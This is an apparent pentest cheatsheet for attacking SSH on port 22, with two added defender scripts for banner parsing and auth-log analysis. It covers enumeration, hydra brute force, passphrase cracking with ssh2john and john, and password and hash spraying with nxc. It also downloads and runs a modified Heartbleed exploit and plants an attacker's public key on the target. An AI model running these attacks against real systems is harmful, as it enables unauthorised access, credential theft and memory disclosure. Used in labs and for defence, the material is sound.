# TCP: SSH - 22

## Connection

```bash
ssh <Username>@<Target IP Address> [-p <Port>]
```

```bash
ssh -i <ID_RSA File Name> [-p <Port>] <Username>@<Target IP Address>
```

> **NOTE: Make sure the id\_rsa file has permissions set to 400; ssh refuses to use a private key that is readable by others**
>
> ```bash
> chmod 400 <ID_RSA File Name>
> ```

## Enumeration

### Banner Grabbing

```bash
nc -vn <Target IP Address> 22
```
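The server answers the `nc` connection above with its identification string before the client sends anything. As an added example (not part of the cheatsheet), the script below splits that string into its fields following RFC 4253 §4.2 (`SSH-protoversion-softwareversion SP comments CR LF`) and classifies the protocol version, which is the same string `nmap -sV` reads. The sample banners are constructed, not captured from any host, and the function names are this example's own.

```bash
#!/bin/sh
# Added example (not from the cheatsheet): parse an SSH identification string
# so a grabbed banner can be inventoried or alerted on.
# Sample banners in demo() are constructed, not captured from a real host.

# Prints "protoversion|softwareversion|comments" on one line;
# returns 1 when the input is not an SSH identification string.
parse_ssh_banner() {
  banner=$(printf '%s' "$1" | tr -d '\r\n')     # strip the CR LF terminator
  case "$banner" in
    SSH-*) ;;
    *) return 1 ;;
  esac
  rest=${banner#SSH-}
  proto=${rest%%-*}                              # up to the first '-'
  case "$rest" in
    *-*) rest=${rest#*-} ;;
    *) return 1 ;;                               # softwareversion missing
  esac
  software=${rest%% *}                           # up to the optional SP
  comments=""
  if [ "$rest" != "$software" ]; then
    comments=${rest#* }
  fi
  printf '%s|%s|%s\n' "$proto" "$software" "$comments"
}

# Classify the protocol field: a modern server announces "2.0";
# "1.99" is the RFC 4253 compatibility marker; anything else 1.x is legacy.
ssh_proto_status() {
  fields=$(parse_ssh_banner "$1") || { echo invalid; return 0; }
  proto=${fields%%|*}
  case "$proto" in
    2.0)  echo ok ;;
    1.99) echo compat ;;
    1.*)  echo legacy ;;
    *)    echo unknown ;;
  esac
}

demo() {
  for b in \
    'SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.6' \
    'SSH-1.99-Cisco-1.25' \
    'SSH-1.5-OpenSSH_2.3.0' \
    'HTTP/1.1 400 Bad Request'; do
    printf '%-45s -> %s  [%s]\n' "$b" \
      "$(parse_ssh_banner "$b" || echo -)" "$(ssh_proto_status "$b")"
  done
}

demo
```

Pipe a live banner through it with `nc -vn <Target IP Address> 22 | head -n 1 | while read -r l; do parse_ssh_banner "$l"; done`; the comments field is where distribution-specific package versions usually appear.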

### Grab Host Key

```bash
ssh-keyscan -t rsa [-p <Port>] <Target IP Address>
```

### Vulnerability Scanning

```bash
ssh-audit -v <Target IP Address>
```

### Nmap

Default Nmap scripts against SSH

```bash
nmap -sC -p <Port> <Target IP Address>
```

Retrieve the service version

```bash
nmap -sV -p <Port> <Target IP Address>
```

Retrieve supported algorithms

```bash
nmap --script ssh2-enum-algos -p <Port> <Target IP Address>
```

Retrieve the full host keys to inspect them for weak keys

```bash
nmap --script ssh-hostkey --script-args ssh_hostkey=full -p <Port> <Target IP Address>
```

Check the authentication methods offered for a user

{% code overflow="wrap" %}

```bash
nmap --script ssh-auth-methods --script-args="ssh.user=root" -p <Port> <Target IP Address>
```

{% endcode %}

## Bruteforce

### Normal Password Bruteforce

```bash
hydra -L <Username List> -P <Password List> -s <Port> ssh://<Target IP Address>
```

```bash
hydra -l <Username> -p <Password> -s <Port> ssh://<Target IP Address>
```

### Passphrase Bruteforce

{% stepper %}
{% step %}

### Retrieve passphrase hash from id\_rsa

```bash
ssh2john id_rsa > ssh.hash
```

{% endstep %}

{% step %}

### Crack hash

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
```

{% endstep %}
{% endstepper %}

### Password Spraying

{% code overflow="wrap" %}

```bash
nxc ssh <Target IP Address> -u <Username Lists> -p <Password Lists> --continue-on-success
```

{% endcode %}

```bash
nxc ssh <Target IP Address> -u <Username Lists> -H <Hash Lists> --continue-on-success
```
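Added defender-side example (not from the cheatsheet): the hydra and nxc runs above leave `Failed password` lines in sshd's auth log, and summarising them per source address separates many failures against one account (brute force) from many distinct accounts tried from one source (spraying). The log lines, host name and RFC 5737 addresses below are constructed; the function names and thresholds are this example's own.

```bash
#!/bin/sh
# Added example (not from the cheatsheet): classify sshd "Failed password"
# lines (auth.log or journalctl -u ssh) by source address.
# Log lines, host name and the 203.0.113.x / 198.51.100.x addresses are constructed.

# Reads log lines on stdin; prints one line per source address:
# "<ip> <failed attempts> <distinct usernames>"
ssh_failure_summary() {
  awk '
    /sshd\[[0-9]+\]: Failed password for / {
      # Locate "for" and "from"; unknown accounts are prefixed "invalid user".
      for (i = 1; i <= NF; i++) if ($i == "for") break
      user = $(i + 1)
      if (user == "invalid" && $(i + 2) == "user") user = $(i + 3)
      for (j = i; j <= NF; j++) if ($j == "from") break
      ip = $(j + 1)
      fails[ip]++
      if (!((ip, user) in seen)) { seen[ip, user] = 1; users[ip]++ }
    }
    END { for (ip in fails) printf "%s %d %d\n", ip, fails[ip], users[ip] }
  '
}

# Sources trying many different accounts (password spraying).
# $1 = minimum number of distinct usernames (default 3).
ssh_spray_sources() {
  ssh_failure_summary | awk -v min="${1:-3}" '$3 >= min { print $1 }'
}

# Sources with many failures regardless of account (brute force).
# $1 = minimum number of failed attempts (default 5).
ssh_bruteforce_sources() {
  ssh_failure_summary | awk -v min="${1:-5}" '$2 >= min { print $1 }'
}

# Constructed sample log in the default OpenSSH syslog format.
sample_auth_log() {
  printf '%s\n' \
    'Jan 10 10:00:01 bastion sshd[1201]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2' \
    'Jan 10 10:00:02 bastion sshd[1202]: Failed password for root from 203.0.113.5 port 51235 ssh2' \
    'Jan 10 10:00:03 bastion sshd[1203]: Failed password for invalid user test from 203.0.113.5 port 51236 ssh2' \
    'Jan 10 10:00:04 bastion sshd[1204]: Failed password for bob from 203.0.113.5 port 51237 ssh2' \
    'Jan 10 10:00:05 bastion sshd[1205]: Accepted publickey for alice from 198.51.100.7 port 40000 ssh2: ED25519 SHA256:<fingerprint>' \
    'Jan 10 10:00:06 bastion sshd[1206]: Failed password for alice from 198.51.100.7 port 40001 ssh2'
}

# Against a real host:  journalctl -u ssh --no-pager | ssh_spray_sources 5
sample_auth_log | ssh_failure_summary
sample_auth_log | ssh_spray_sources 3
```

With the sample data only 203.0.113.5 is reported: four failures across four different accounts, which matches a spray with a user list, while the single failure from 198.51.100.7 stays below both thresholds.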

## Exploit

### Heartbleed.py

GitHub Gist: <https://gist.github.com/eelsivart/10174134>

{% code overflow="wrap" %}

```bash
curl -O https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py
```

{% endcode %}

Modify the following part (the requested payload length is reduced from 0x4000 to 0x1000)

{% tabs %}
{% tab title="Before" %}

```python
def build_heartbeat(tls_ver):
    heartbeat = [
        0x18,           # Content Type (Heartbeat)
        0x03, tls_ver,  # TLS version
        0x00, 0x03,     # Length
        # Payload
        0x01,           # Type (Request)
        0x40, 0x00      # Payload length
    ]
    return heartbeat
```

{% endtab %}

{% tab title="After" %}

```python
def build_heartbeat(tls_ver):
    heartbeat = [
        0x18,           # Content Type (Heartbeat)
        0x03, tls_ver,  # TLS version
        0x00, 0x03,     # Length
        # Payload
        0x01,           # Type (Request)
        0x10, 0x00      # Payload length
    ]
    return heartbeat
```

{% endtab %}
{% endtabs %}

```bash
python heartbleed.py <Target IP Address>
```

To include a hexdump

```bash
python heartbleed.py -x <Target IP Address>
```

For repeated runs

```bash
python heartbleed.py -n <Count> <Target IP Address>
```

### Fake user

{% stepper %}
{% step %}

### Generate id\_rsa

```bash
ssh-keygen -t rsa
```

{% endstep %}

{% step %}

### Copy the content of id\_rsa.pub and paste it on the target machine

```bash
cat /home/kali/offsec/.ssh/id_rsa.pub
```

{% endstep %}
{% endstepper %}

